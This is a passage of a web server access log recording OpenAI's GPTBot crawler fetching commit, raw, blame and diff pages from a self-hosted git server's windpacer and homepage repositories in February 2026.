Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" +[17/Feb/2026:13:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" +[17/Feb/2026:13:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 9942] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" +[17/Feb/2026:13:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" +[17/Feb/2026:13:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 61126] [Gzip 57.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:13:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 14935] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.diff" [Client 74.7.227.38] [Length 361] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.diff" [Client 74.7.227.38] [Length 3101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" +[17/Feb/2026:13:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.patch" [Client 74.7.227.38] [Length 3512] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" +[17/Feb/2026:13:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" +[17/Feb/2026:13:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10961] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29882] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 15888] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" [Client 74.7.227.38] [Length 11651] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 7497] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" [Client 74.7.227.38] [Length 12586] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 12344] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" [Client 74.7.227.38] [Length 11652] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:13:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" [Client 74.7.227.38] [Length 11650] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" [Client 74.7.227.38] [Length 11618] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 44856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 36711] [Gzip 25.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 19730] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" +[17/Feb/2026:13:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" +[17/Feb/2026:13:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 11834] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" +[17/Feb/2026:13:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12239] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10943] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 19730] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:13:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11628] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" +[17/Feb/2026:13:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 10135] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" +[17/Feb/2026:13:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11126] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11998] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" +[17/Feb/2026:13:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16158] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:13:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:13:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10101] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist" +[17/Feb/2026:13:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10195] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11782] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10379] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9879] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10151] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10169] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10373] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10423] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" +[17/Feb/2026:13:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10899] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" [Client 74.7.227.38] [Length 10347] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build" +[17/Feb/2026:13:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr 